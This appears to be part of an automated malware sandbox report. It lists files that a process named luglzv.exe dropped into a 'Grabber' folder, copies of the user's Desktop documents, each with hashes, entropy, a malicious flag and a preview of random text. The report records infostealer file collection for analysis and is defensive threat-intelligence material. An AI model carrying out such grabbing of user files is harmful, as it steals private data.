                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:true
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMF